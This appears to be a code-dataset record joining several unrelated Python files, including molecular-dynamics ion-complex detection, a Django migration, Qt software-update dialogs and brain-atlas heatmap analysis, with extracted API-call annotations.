                # save information as class Snap (columns 3:6 are x, y, z)
                snapshots.append(
                    Snap(iteration, time, cell, np.array(table[:, 3:6], dtype=np.float64), df))
    return snapshots
########################################################################################################################
# FIND ION COMPLEXES IN MULTIPLE SNAPSHOTS
# WARNING: NOT IN USE BECAUSE NO PARALLEL COMPUTING
########################################################################################################################
# INPUT
# str root root name for saving file
# list class Snap snapshots list with information to be saved
# str id1 identifier for atom used as center (e.g. 'MN'); only one allowed to be in snap
# str id2 identifier for atoms as possible first neighbors (e.g. 'O_')
# str id3 identifier for atoms as possible neighbors of first neighbors (e.g. 'H_')
# float cut1 (optional) cutoff distance for first neighbor search
# float cut2 (optional) cutoff distance for second neighbor search
#####
# OUTPUT
# list class Snap complex list with all ion complexes found
########################################################################################################################
# def ion_find(root, snapshots, id1, id2, id3, cut1=3.0, cut2=1.4):
# complex = []
# # loop through different snapshots
# for snap in snapshots:
# # get complex information
# comp = ion_single(snap, id1, id2, id3, cut1, cut2)
# # append Snap object for data storage
# complex.append(Snap(snap.iter, snap.time, snap.cell, None, None, dataframe=comp))
# # save information to file
# ion_save(root, complex, id1, id2, id3, cut1, cut2)
# return complex
########################################################################################################################
# ROUTINE TO FIND ION COMPLEXES FOR MULTIPLE SNAPSHOTS
# PARALLEL VERSION OF ion_find() WITH PROGRESS BAR IN CONSOLE
########################################################################################################################
# INPUT
# str root root name for saving file
# list class Snap snapshots list with information to be saved
# str id1 identifier for atom used as center (e.g. 'MN'); only one allowed to be in snap
# str id2 identifier for atoms as possible first neighbors (e.g. 'O_')
# str id3 identifier for atoms as possible neighbors of first neighbors (e.g. 'H_')
# float cut1 (optional) cutoff distance for first neighbor search
# float cut2 (optional) cutoff distance for second neighbor search
#####
# OUTPUT
# list class Snap ion_comp list of ion complexes found
########################################################################################################################
def ion_find_parallel(root, snapshots, id1, id2, id3, cut1, cut2):
    """Locate ion complexes in every snapshot, in parallel.

    Args:
        root (str): root name of the files
        snapshots (list[:class:`.Snap`]): snapshots with the atomic information
        id1 (str): identifier for atom used as center (e.g. 'MN')
        id2 (str): identifier for atoms as possible first neighbors (e.g. 'O\_')
        id3 (str): identifier for atoms as possible neighbors of first
            neighbors (e.g. 'H\_')
        cut1 (float): cutoff distance for first neighbor search
        cut2 (float): cutoff distance for second neighbor search

    Returns:
        list[:class:`.Snap`]: list of snapshots containing an ion complex

    Parallelization based on :py:mod:`multiprocessing`.

    Note:
        Only one atom of type :data:`id1` allowed to be in a snapshot at
        the moment.
    """
    print("ION COMPLEX DETECTION IN PROGRESS")
    # Freeze the per-run arguments; partial (unlike a lambda) survives
    # pickling for the worker processes.
    worker = partial(ion_single, id1=id1, id2=id2, id3=id3, cut1=cut1, cut2=cut2)
    # Map the worker over all snapshots with a console progress bar.
    ion_comp = progress.parallel_progbar(worker, snapshots)
    # Persist the results for later analysis.
    ion_save(root, ion_comp, id1, id2, id3, cut1, cut2)
    print("ION COMPLEX DETECTION FINISHED")
    return ion_comp
| [
"pandas.DataFrame",
"numpy.array",
"functools.partial",
"numpy.savetxt",
"miniutils.progress_bar.parallel_progbar",
"pandas.concat"
] | [((3330, 3371), 'pandas.concat', 'pd.concat', (['[id1_list, id2_list, id3_list]'], {}), '([id1_list, id2_list, id3_list])\n', (3339, 3371), True, 'import pandas as pd\n'), ((6036, 6082), 'numpy.savetxt', 'np.savetxt', (['f', 'snapshots[0].cell'], {'fmt': '"""%14.8f"""'}), "(f, snapshots[0].cell, fmt='%14.8f')\n", (6046, 6082), True, 'import numpy as np\n'), ((12748, 12816), 'functools.partial', 'partial', (['ion_single'], {'id1': 'id1', 'id2': 'id2', 'id3': 'id3', 'cut1': 'cut1', 'cut2': 'cut2'}), '(ion_single, id1=id1, id2=id2, id3=id3, cut1=cut1, cut2=cut2)\n', (12755, 12816), False, 'from functools import partial\n'), ((12858, 12905), 'miniutils.progress_bar.parallel_progbar', 'progress.parallel_progbar', (['multi_one', 'snapshots'], {}), '(multi_one, snapshots)\n', (12883, 12905), True, 'import miniutils.progress_bar as progress\n'), ((6450, 6524), 'numpy.savetxt', 'np.savetxt', (['f', 'snapshots[i].atoms'], {'fmt': '"""%-14s%-14s%-14d%14.8f%14.8f%14.8f"""'}), "(f, snapshots[i].atoms, fmt='%-14s%-14s%-14d%14.8f%14.8f%14.8f')\n", (6460, 6524), True, 'import numpy as np\n'), ((8219, 8259), 'numpy.array', 'np.array', (['text[i + 1:i + 4]'], {'dtype': 'float'}), '(text[i + 1:i + 4], dtype=float)\n', (8227, 8259), True, 'import numpy as np\n'), ((8492, 8529), 'numpy.array', 'np.array', (['text[i + 2:i + 2 + n_atoms]'], {}), '(text[i + 2:i + 2 + n_atoms])\n', (8500, 8529), True, 'import numpy as np\n'), ((8674, 8705), 'numpy.array', 'np.array', (['test[:, 2]'], {'dtype': 'int'}), '(test[:, 2], dtype=int)\n', (8682, 8705), True, 'import numpy as np\n'), ((8727, 8751), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'atoms'}), '(data=atoms)\n', (8739, 8751), True, 'import pandas as pd\n'), ((8857, 8897), 'numpy.array', 'np.array', (['test[:, 3:6]'], {'dtype': 'np.float64'}), '(test[:, 3:6], dtype=np.float64)\n', (8865, 8897), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('facilities', '0001_auto_20160328_1426'),
]
operations = [
migrations.AddField(
model_name='facilityunit',
name='license_number',
field=models.CharField(max_length=100, null=True, blank=True),
),
migrations.AlterField(
model_name='facilitytype',
name='sub_division',
field=models.CharField(help_text=b'Parent of the facility type e.g sub-district hospitals are under Hospitals.', max_length=100, null=True, blank=True),
),
]
| [
"django.db.models.CharField"
] | [((367, 422), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'null': '(True)', 'blank': '(True)'}), '(max_length=100, null=True, blank=True)\n', (383, 422), False, 'from django.db import migrations, models\n'), ((556, 711), 'django.db.models.CharField', 'models.CharField', ([], {'help_text': "b'Parent of the facility type e.g sub-district hospitals are under Hospitals.'", 'max_length': '(100)', 'null': '(True)', 'blank': '(True)'}), "(help_text=\n b'Parent of the facility type e.g sub-district hospitals are under Hospitals.'\n , max_length=100, null=True, blank=True)\n", (572, 711), False, 'from django.db import migrations, models\n')] |
# Copyright (c) 2015-2016 <NAME> <<EMAIL>>
# See LICENSE file for copyright information.
import sys
if 'PySide6' in sys.modules:
from PySide6.QtWidgets import QMessageBox, QLabel, QTextEdit
_exec_attr = 'exec'
elif 'PyQt6' in sys.modules:
from PyQt6.QtWidgets import QMessageBox, QLabel, QTextEdit
_exec_attr = 'exec'
elif 'PySide2' in sys.modules:
from PySide2.QtWidgets import QMessageBox, QLabel, QTextEdit
_exec_attr = 'exec_'
elif 'PyQt5' in sys.modules:
from PyQt5.QtWidgets import QMessageBox, QLabel, QTextEdit
_exec_attr = 'exec_'
else:
if 'PySide' in sys.modules:
from PySide.QtGui import QMessageBox, QLabel, QTextEdit
elif 'PyQt4' in sys.modules:
from PyQt4.QtGui import QMessageBox, QLabel, QTextEdit
else:
raise ImportError("cannot determine Qt bindings: import desired Qt module first")
_exec_attr = 'exec_'
QMessageBox.ButtonRole.YesRole = QMessageBox.YesRole
QMessageBox.ButtonRole.NoRole = QMessageBox.NoRole
QMessageBox.ButtonRole.RejectRole = QMessageBox.RejectRole
QMessageBox.StandardButton.Ok = QMessageBox.Ok
QMessageBox.StandardButton.Yes = QMessageBox.Yes
QMessageBox.StandardButton.No = QMessageBox.No
def ask_for_autocheck(pysparkle):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Question)
dialog.setWindowTitle(dialog.tr("Check for updates automatically?"))
dialog.setText(dialog.tr("Should {} automatically check for updates?").format(pysparkle.appname))
dialog.setInformativeText(dialog.tr("You can always check for updates manually from the menu."))
dialog.setStandardButtons(QMessageBox.StandardButton.Yes | QMessageBox.StandardButton.No)
result = getattr(dialog, _exec_attr)()
return result == QMessageBox.StandardButton.Yes
def update_error(msg=None):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Critical)
dialog.setWindowTitle(dialog.tr("Update Error!"))
dialog.setText(dialog.tr("An error occurred in retrieving update information; "
"are you connected to the internet? Please try again later."))
if msg is not None:
dialog.setDetailedText(msg)
dialog.setStandardButtons(QMessageBox.StandardButton.Ok)
getattr(dialog, _exec_attr)()
def no_info(pysparkle):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Warning)
dialog.setWindowTitle(dialog.tr("No update information!"))
dialog.setText(dialog.tr("There is no update information for {}.\n\n"
"Maybe the software is not supported for your operating system...")
.format(pysparkle.appname))
dialog.setStandardButtons(QMessageBox.StandardButton.Ok)
getattr(dialog, _exec_attr)()
def no_update(pysparkle):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Information)
dialog.setWindowTitle(dialog.tr("You're up to date!"))
dialog.setText(dialog.tr("{} {} is currently the newest version available.")
.format(pysparkle.appname, pysparkle.appver))
dialog.setStandardButtons(QMessageBox.StandardButton.Ok)
getattr(dialog, _exec_attr)()
def update_available(pysparkle, maxitem, items):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Information)
dialog.setWindowTitle(dialog.tr("A new version of {} is available!").format(pysparkle.appname))
dialog.setText(dialog.tr("{} {} is now available (you have {}).\n\nWould you like to download it now?")
.format(pysparkle.appname, maxitem['version'], pysparkle.appver))
if any(item['notes'] for item in items):
grid = dialog.layout()
label = QLabel(dialog.tr("Release notes:"))
grid.addWidget(label, grid.rowCount(), 0, 1, grid.columnCount())
notes = QTextEdit()
notes.setText("<br/>\n".join("<h3>{title}</h3>\n{notes}\n".format(**item) for item in items))
notes.setFixedHeight(200)
notes.setReadOnly(True)
grid.addWidget(notes, grid.rowCount(), 0, 1, grid.columnCount())
dialog.updateGeometry()
get_button = dialog.addButton(dialog.tr("Get update"), QMessageBox.ButtonRole.YesRole)
skip_button = dialog.addButton(dialog.tr("Skip this version"), QMessageBox.ButtonRole.NoRole)
later_button = dialog.addButton(dialog.tr("Remind me later"), QMessageBox.ButtonRole.RejectRole)
getattr(dialog, _exec_attr)()
result = dialog.clickedButton()
if result in (get_button, skip_button):
return result == get_button
| [
"PyQt4.QtGui.QMessageBox",
"PyQt4.QtGui.QTextEdit"
] | [((1275, 1288), 'PyQt4.QtGui.QMessageBox', 'QMessageBox', ([], {}), '()\n', (1286, 1288), False, 'from PyQt4.QtGui import QMessageBox, QLabel, QTextEdit\n'), ((1843, 1856), 'PyQt4.QtGui.QMessageBox', 'QMessageBox', ([], {}), '()\n', (1854, 1856), False, 'from PyQt4.QtGui import QMessageBox, QLabel, QTextEdit\n'), ((2327, 2340), 'PyQt4.QtGui.QMessageBox', 'QMessageBox', ([], {}), '()\n', (2338, 2340), False, 'from PyQt4.QtGui import QMessageBox, QLabel, QTextEdit\n'), ((2803, 2816), 'PyQt4.QtGui.QMessageBox', 'QMessageBox', ([], {}), '()\n', (2814, 2816), False, 'from PyQt4.QtGui import QMessageBox, QLabel, QTextEdit\n'), ((3230, 3243), 'PyQt4.QtGui.QMessageBox', 'QMessageBox', ([], {}), '()\n', (3241, 3243), False, 'from PyQt4.QtGui import QMessageBox, QLabel, QTextEdit\n'), ((3803, 3814), 'PyQt4.QtGui.QTextEdit', 'QTextEdit', ([], {}), '()\n', (3812, 3814), False, 'from PyQt4.QtGui import QMessageBox, QLabel, QTextEdit\n')] |
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from matplotlib.colors import LinearSegmentedColormap
ms_color = [0.12156863, 0.46666667, 0.70588235, 1]
hc_color = [1., 0.49803922, 0.05490196, 1]
SMALL_SIZE = 12
MEDIUM_SIZE = 14
BIGGER_SIZE = 16
plt.rc('font', size=SMALL_SIZE) # controls default text sizes
plt.rc('axes', titlesize=BIGGER_SIZE) # fontsize of the axes title
plt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels
plt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize
plt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title
# set serif font
plt.rc('font', family='serif')
def generate_transparanet_cm(base='coolwarm', name="TransCoWa"):
# copy from existing colormap
ncolors = 256
color_array = plt.get_cmap(base)(range(ncolors))
# create parabolic decrease
decr = [-1*(x**2)+1 for x in range(int(ncolors/2))]
# normalize
decr = (decr - np.min(decr))/(np.max(decr - np.min(decr)))
# use inverted parabola as increase
incr = np.copy(decr)[::-1]
alphas = np.concatenate((decr, incr))
# update alpha values
color_array[:,-1] = alphas
# create new colormap and register it
transparent_coolwarm = LinearSegmentedColormap.from_list(name, color_array)
plt.register_cmap(cmap=transparent_coolwarm)
def get_labels_dict(path):
import xmltodict
with open(path) as f:
labels_xml = xmltodict.parse(f.read())['atlas']['data']['label']
labels_dict = {}
for row in labels_xml:
labels_dict[int(row['index'])] = row['name']
return labels_dict
def heatmap_per_region(hm, atlas, positive=True, size_normalize=False, signed=False):
# get heatmap mean per region
# use only positive values
signed_hm = np.copy(hm)
if signed:
if positive:
signed_hm[signed_hm<0] = 0
else:
signed_hm[signed_hm>0] = 0
regional_hm = {}
for lbl_idx in np.unique(atlas):
# skip outside area
if lbl_idx != 0:
atlas_lbl = atlas.copy()
# get region mask for each label
atlas_lbl[lbl_idx!=atlas] = 0
atlas_lbl[lbl_idx==atlas] = 1
# multiply region mask with heatmap
region_intensity = np.mean(atlas_lbl * np.squeeze(signed_hm))
if size_normalize:
region_size = np.sum(atlas_lbl).item()
region_intensity /= region_size
regional_hm[lbl_idx] = region_intensity
return regional_hm
def aggregate_regions(regional_hm, all_areas):
# aggregate atlas regions to previously defined areas
area_hm = {}
for name, (min_idx, max_idx) in all_areas.items():
regions_fit = []
for key in regional_hm.keys():
if key in range(min_idx, max_idx+1):
regions_fit.append(regional_hm[key])
region_mean = np.mean(regions_fit)
area_hm[name] = region_mean
return area_hm
def get_area_relevance(heatmaps, atlas, area_dict, positive=True, size_normalize=True):
keys = []
values = []
for hm in heatmaps:
regional_hm = heatmap_per_region(hm, atlas, positive=positive, size_normalize=size_normalize)
area_hm = aggregate_regions(regional_hm, area_dict)
# sort by values
area_hm_sorted = sorted(area_hm.items(), key=lambda kv: kv[1])
keys_sorted = [row[0] for row in area_hm_sorted]
values_sorted = [row[1] for row in area_hm_sorted]
keys.append(keys_sorted)
values.append(values_sorted)
return keys, values
def translate_keys(keys):
names_list = []
for key_list in keys:
name_list = []
for key in key_list:
name_list.append(short_name_map[key])
names_list.append(name_list)
return names_list
def wrap_as_df(keys, values):
df_ms = pd.DataFrame({"values_ms": values[0]}, keys[0])
df_hc = pd.DataFrame({"values_hc": values[1]}, keys[1])
df = pd.merge(df_ms, df_hc, left_index=True, right_index=True, how='outer')
return df
def reduce_df(df, take=30):
# get order based on relevance sum
abs_order = (np.abs(df["values_hc"]) + np.abs(df["values_ms"])).sort_values().index
most = abs_order[-take:]
short_df = df.loc[most]
order = (short_df["values_hc"] + short_df["values_ms"]).sort_values().index
short_df = df.loc[order]
return short_df
def reduce_two_dfs(df_zero, df_one, take=30):
abs_order = (df_zero.abs().sum() + df_one.abs().sum()).sort_values().index
most = abs_order[-take:]
# columns are keys so use [:, key]
short_df_zero = df_zero.loc[:,most]
short_df_one = df_one.loc[:,most]
order = (short_df_zero.sum() + short_df_one.sum()).sort_values().index
short_df_zero = short_df_zero.reindex(order, axis=1)
short_df_one = short_df_one.reindex(order, axis=1)
return short_df_zero, short_df_one
def plot_key_value_pairs(keys, values, title, loc="center left"):
plt.figure(figsize=(10, 6))
plt.plot(keys[0], values[0], 'o', color=ms_color, label="CDMS")
plt.plot(keys[1], values[1], 'o', color=hc_color, label="HC")
plt.xticks(rotation='vertical')
plt.legend(loc=loc)
plt.title(title)
plt.show()
def plot_dataframe(df, title, loc="center left"):
plt.figure(figsize=(10, 6))
plt.plot(df["values_ms"], 'o', color=ms_color, label="CDMS")
plt.plot(df["values_hc"], 'o', color=hc_color, label="HC")
plt.xticks(rotation='vertical')
plt.legend(loc=loc)
plt.title(title)
plt.show()
# Modified areas from Visualizing evidence for AD paper by
# Boehle et al. Based on Neuromorphometrics atlas from SPM12
# Name: (min, max)
gm_areas= {
"Accumbens": (23, 30),
"Amygdala": (31, 32),
"Brain Stem": (35, 35),
"Caudate": (36, 37),
"Cerebellum": (38, 41),
"Hippocampus": (47, 48),
"Parahippocampal gyrus": (170, 171),
"Pallidum": (55, 56),
"Putamen": (57, 58),
"Thalamus": (59, 60),
"CWM": (44, 45),
"ACG": (100, 101),
"Ant. Insula": (102, 103),
"Post. Insula": (172, 173),
"AOG": (104, 105),
"AG": (106, 107),
"Cuneus": (114, 115),
"Central operculum": (112, 113),
"Frontal operculum": (118, 119),
"Frontal pole": (120, 121),
"Fusiform gyrus": (122, 123),
"Temporal pole": (202, 203),
"TrIFG": (204, 205),
"TTG": (206, 207),
"Entorh. cortex": (116, 117),
"Parietal operculum": (174, 175),
"SPL": (198, 199),
"CSF": (46, 46),
"3rd Ventricle": (4, 4),
"4th Ventricle": (11, 11),
"Lateral Ventricles": (49, 52),
"Diencephalon": (61, 62),
"Vessels": (63, 64),
"Optic Chiasm": (69, 69),
"Vermal Lobules": (71, 73),
"Basal Forebrain": (75, 76),
"Calc": (108, 109),
"GRe": (124, 125),
"IOG": (128, 129),
"ITG": (132, 133),
"LiG": (134, 135),
"LOrG": (136, 137),
"MCgG": (138, 139),
"MFC": (140, 141),
"MFG": (142, 143),
"MOG": (144, 145),
"MOrG": (146, 147),
"MPoG": (148, 149),
"MPrG": (150, 151),
"MSFG": (152, 153),
"MTG": (154, 155),
"OCP": (156, 157),
"OFuG": (160, 161),
"OpIFG": (162, 163),
"OrIFG": (164, 165),
"PCgG": (166, 167),
"PCu": (168, 169),
"PoG": (176, 177),
"POrG": (178, 179),
"PP": (180, 181),
"PrG": (182, 183),
"PT": (184, 185),
"SCA": (186, 187),
"SFG": (190, 191),
"SMC": (192, 193),
"SMG": (194, 195),
"SOG": (196, 197),
"STG": (200, 201),
}
short_name_map = {
'Accumbens': 'Accumbens',
'Amygdala': 'Amygdala',
'Brain Stem': 'Brain Stem',
'Caudate': 'Caudate',
'Cerebellum': 'Cerebellum',
'Hippocampus': 'Hippocampus',
'Parahippocampal gyrus': 'Parahippocampal gyr.',
'Pallidum': 'Pallidum',
'Putamen': 'Putamen',
'Thalamus': 'Thalamus',
'Diencephalon': 'Diencephalon',
'CWM': 'Cerebral white matter',
'ACG': 'Ant. cingulate gyr.',
'Ant. Insula': 'Ant. insula',
'Post. Insula': 'Post. insula',
'AOG': 'Ant. orbital gyr.',
'AG': 'Angular gyr.',
'Cuneus': 'Cuneus',
'Central operculum': 'Central operculum',
'Frontal operculum': 'Frontal operculum',
'Frontal pole': 'Frontal pole',
'Fusiform gyrus': 'Fusiform gyr.',
'Temporal pole': 'Temporal pole',
'TrIFG': 'Triangular part of IFG',
'TTG': 'Trans. temporal gyr.',
'Entorh. cortex': 'Entorhinal area',
'Parietal operculum': 'Parietal operculum',
'SPL': 'Sup. parietal lobule',
'CSF': 'CSF',
'3rd Ventricle': '3rd Ventricle',
'4th Ventricle': '4th Ventricle',
'Lateral Ventricles': 'Inf. Lat. Ventricles',
'Vessels': 'Vessels',
'Optic Chiasm': 'Optic Chiasm',
'Vermal Lobules': 'Cereb. Verm. Lob.',
'Basal Forebrain': 'Basal Forebrain',
'Calc': 'Calcarine cortex',
'GRe': 'Gyrus rectus',
'IOG': 'Inf. occipital gyr.',
'ITG': 'Inf. temporal gyr.',
'LiG': 'Lingual gyr.',
'LOrG': 'Lat. orbital gyr.',
'MCgG': 'Mid. cingulate gyr.',
'MFC': 'Med. frontal cortex',
'MFG': 'Mid. frontal gyr.',
'MOG': 'Mid. occipital gyr.',
'MOrG': 'Med. orbital gyr.',
'MPoG': 'Post. gyr. med. seg.',
'MPrG': 'Pre. gyr. med. seg.',
'MSFG': 'Sup. frontal gyr. med. seg.',
'MTG': 'Mid. temporal gyr.',
'OCP': 'Occipital pole',
'OFuG': 'Occipital fusiform gyr.',
'OpIFG': 'Opercular part of IFG',
'OrIFG': 'Orbital part of IFG',
'PCgG': 'Post. cingulate gyr.',
'PCu': 'Precuneus',
'PoG': 'Postcentral gyr.',
'POrG': 'Post. orbital gyr.',
'PP': 'Planum polare',
'PrG': 'Precentral gyr.',
'PT': 'Planum temporale',
'SCA': 'Subcallosal area',
'SFG': 'Sup. frontal gyr.',
'SMC': 'Supp. motor cortex',
'SMG': 'Supramarginal gyr.',
'SOG': 'Sup. occipital gyr.',
'STG': 'Sup. temporal gyr.'
}
# Aggregated white matter areas from JHU ICBM DTI atlas from FSL
# Name: (min, max)
wm_areas= {
"Middle cerebellar peduncle": (1, 2),
"Corpus callosum": (3, 5),
"Fornix": (6, 6),
"Corticospinal tract": (7, 8),
"Medial lemniscus": (9, 10),
"Inferior cerebellar peduncle": (11, 12),
"Superior cerebellar peduncle": (13, 14),
"Cerebral peduncle": (15, 16),
"Anterior limb of internal capsule": (17, 18),
"Posterior limb of internal capsule": (19, 20),
"Retrolenticular part of internal capsule": (21, 22),
"Anterior corona radiata": (23, 24),
"Superior corona radiata": (25, 26),
"Posterior corona radiata": (27, 28),
"Posterior thalamic radiation": (29, 30),
"Sagittal stratum": (31, 32),
"External capsule": (33, 34),
"Cingulum": (35, 38),
"Superior longitudinal fasciculus": (41, 42),
"Superior fronto-occipital fasciculus": (43, 44),
"Uncinate fasciculus": (45, 46),
"Tapetum": (47, 48),
}
| [
"numpy.mean",
"matplotlib.pyplot.plot",
"numpy.concatenate",
"numpy.min",
"pandas.DataFrame",
"numpy.abs",
"matplotlib.pyplot.xticks",
"pandas.merge",
"numpy.squeeze",
"matplotlib.pyplot.register_cmap",
"matplotlib.pyplot.title",
"matplotlib.colors.LinearSegmentedColormap.from_list",
"matplo... | [((272, 303), 'matplotlib.pyplot.rc', 'plt.rc', (['"""font"""'], {'size': 'SMALL_SIZE'}), "('font', size=SMALL_SIZE)\n", (278, 303), True, 'import matplotlib.pyplot as plt\n'), ((343, 380), 'matplotlib.pyplot.rc', 'plt.rc', (['"""axes"""'], {'titlesize': 'BIGGER_SIZE'}), "('axes', titlesize=BIGGER_SIZE)\n", (349, 380), True, 'import matplotlib.pyplot as plt\n'), ((414, 451), 'matplotlib.pyplot.rc', 'plt.rc', (['"""axes"""'], {'labelsize': 'MEDIUM_SIZE'}), "('axes', labelsize=MEDIUM_SIZE)\n", (420, 451), True, 'import matplotlib.pyplot as plt\n'), ((488, 525), 'matplotlib.pyplot.rc', 'plt.rc', (['"""xtick"""'], {'labelsize': 'SMALL_SIZE'}), "('xtick', labelsize=SMALL_SIZE)\n", (494, 525), True, 'import matplotlib.pyplot as plt\n'), ((559, 596), 'matplotlib.pyplot.rc', 'plt.rc', (['"""ytick"""'], {'labelsize': 'SMALL_SIZE'}), "('ytick', labelsize=SMALL_SIZE)\n", (565, 596), True, 'import matplotlib.pyplot as plt\n'), ((630, 667), 'matplotlib.pyplot.rc', 'plt.rc', (['"""legend"""'], {'fontsize': 'SMALL_SIZE'}), "('legend', fontsize=SMALL_SIZE)\n", (636, 667), True, 'import matplotlib.pyplot as plt\n'), ((689, 728), 'matplotlib.pyplot.rc', 'plt.rc', (['"""figure"""'], {'titlesize': 'BIGGER_SIZE'}), "('figure', titlesize=BIGGER_SIZE)\n", (695, 728), True, 'import matplotlib.pyplot as plt\n'), ((779, 809), 'matplotlib.pyplot.rc', 'plt.rc', (['"""font"""'], {'family': '"""serif"""'}), "('font', family='serif')\n", (785, 809), True, 'import matplotlib.pyplot as plt\n'), ((1235, 1263), 'numpy.concatenate', 'np.concatenate', (['(decr, incr)'], {}), '((decr, incr))\n', (1249, 1263), True, 'import numpy as np\n'), ((1391, 1443), 'matplotlib.colors.LinearSegmentedColormap.from_list', 'LinearSegmentedColormap.from_list', (['name', 'color_array'], {}), '(name, color_array)\n', (1424, 1443), False, 'from matplotlib.colors import LinearSegmentedColormap\n'), ((1448, 1492), 'matplotlib.pyplot.register_cmap', 'plt.register_cmap', ([], {'cmap': 'transparent_coolwarm'}), 
'(cmap=transparent_coolwarm)\n', (1465, 1492), True, 'import matplotlib.pyplot as plt\n'), ((1934, 1945), 'numpy.copy', 'np.copy', (['hm'], {}), '(hm)\n', (1941, 1945), True, 'import numpy as np\n'), ((2123, 2139), 'numpy.unique', 'np.unique', (['atlas'], {}), '(atlas)\n', (2132, 2139), True, 'import numpy as np\n'), ((4030, 4077), 'pandas.DataFrame', 'pd.DataFrame', (["{'values_ms': values[0]}", 'keys[0]'], {}), "({'values_ms': values[0]}, keys[0])\n", (4042, 4077), True, 'import pandas as pd\n'), ((4090, 4137), 'pandas.DataFrame', 'pd.DataFrame', (["{'values_hc': values[1]}", 'keys[1]'], {}), "({'values_hc': values[1]}, keys[1])\n", (4102, 4137), True, 'import pandas as pd\n'), ((4148, 4218), 'pandas.merge', 'pd.merge', (['df_ms', 'df_hc'], {'left_index': '(True)', 'right_index': '(True)', 'how': '"""outer"""'}), "(df_ms, df_hc, left_index=True, right_index=True, how='outer')\n", (4156, 4218), True, 'import pandas as pd\n'), ((5155, 5182), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 6)'}), '(figsize=(10, 6))\n', (5165, 5182), True, 'import matplotlib.pyplot as plt\n'), ((5187, 5250), 'matplotlib.pyplot.plot', 'plt.plot', (['keys[0]', 'values[0]', '"""o"""'], {'color': 'ms_color', 'label': '"""CDMS"""'}), "(keys[0], values[0], 'o', color=ms_color, label='CDMS')\n", (5195, 5250), True, 'import matplotlib.pyplot as plt\n'), ((5255, 5316), 'matplotlib.pyplot.plot', 'plt.plot', (['keys[1]', 'values[1]', '"""o"""'], {'color': 'hc_color', 'label': '"""HC"""'}), "(keys[1], values[1], 'o', color=hc_color, label='HC')\n", (5263, 5316), True, 'import matplotlib.pyplot as plt\n'), ((5321, 5352), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '"""vertical"""'}), "(rotation='vertical')\n", (5331, 5352), True, 'import matplotlib.pyplot as plt\n'), ((5357, 5376), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': 'loc'}), '(loc=loc)\n', (5367, 5376), True, 'import matplotlib.pyplot as plt\n'), ((5381, 5397), 'matplotlib.pyplot.title', 
'plt.title', (['title'], {}), '(title)\n', (5390, 5397), True, 'import matplotlib.pyplot as plt\n'), ((5402, 5412), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5410, 5412), True, 'import matplotlib.pyplot as plt\n'), ((5468, 5495), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 6)'}), '(figsize=(10, 6))\n', (5478, 5495), True, 'import matplotlib.pyplot as plt\n'), ((5500, 5560), 'matplotlib.pyplot.plot', 'plt.plot', (["df['values_ms']", '"""o"""'], {'color': 'ms_color', 'label': '"""CDMS"""'}), "(df['values_ms'], 'o', color=ms_color, label='CDMS')\n", (5508, 5560), True, 'import matplotlib.pyplot as plt\n'), ((5565, 5623), 'matplotlib.pyplot.plot', 'plt.plot', (["df['values_hc']", '"""o"""'], {'color': 'hc_color', 'label': '"""HC"""'}), "(df['values_hc'], 'o', color=hc_color, label='HC')\n", (5573, 5623), True, 'import matplotlib.pyplot as plt\n'), ((5628, 5659), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '"""vertical"""'}), "(rotation='vertical')\n", (5638, 5659), True, 'import matplotlib.pyplot as plt\n'), ((5664, 5683), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': 'loc'}), '(loc=loc)\n', (5674, 5683), True, 'import matplotlib.pyplot as plt\n'), ((5688, 5704), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (5697, 5704), True, 'import matplotlib.pyplot as plt\n'), ((5709, 5719), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5717, 5719), True, 'import matplotlib.pyplot as plt\n'), ((946, 964), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['base'], {}), '(base)\n', (958, 964), True, 'import matplotlib.pyplot as plt\n'), ((1202, 1215), 'numpy.copy', 'np.copy', (['decr'], {}), '(decr)\n', (1209, 1215), True, 'import numpy as np\n'), ((3057, 3077), 'numpy.mean', 'np.mean', (['regions_fit'], {}), '(regions_fit)\n', (3064, 3077), True, 'import numpy as np\n'), ((1106, 1118), 'numpy.min', 'np.min', (['decr'], {}), '(decr)\n', (1112, 1118), True, 'import numpy as np\n'), ((1135, 
1147), 'numpy.min', 'np.min', (['decr'], {}), '(decr)\n', (1141, 1147), True, 'import numpy as np\n'), ((2459, 2480), 'numpy.squeeze', 'np.squeeze', (['signed_hm'], {}), '(signed_hm)\n', (2469, 2480), True, 'import numpy as np\n'), ((4318, 4341), 'numpy.abs', 'np.abs', (["df['values_hc']"], {}), "(df['values_hc'])\n", (4324, 4341), True, 'import numpy as np\n'), ((4344, 4367), 'numpy.abs', 'np.abs', (["df['values_ms']"], {}), "(df['values_ms'])\n", (4350, 4367), True, 'import numpy as np\n'), ((2543, 2560), 'numpy.sum', 'np.sum', (['atlas_lbl'], {}), '(atlas_lbl)\n', (2549, 2560), True, 'import numpy as np\n')] |
# coding=utf-8
import io
import os
import re
from setuptools import setup, find_packages
def get_path(*args):
return os.path.join(os.path.dirname(__file__), *args)
def read_from(filepath):
with io.open(filepath, 'rt', encoding='utf8') as f:
return f.read()
def get_requirements(filename='requirements.txt'):
data = read_from(get_path(filename))
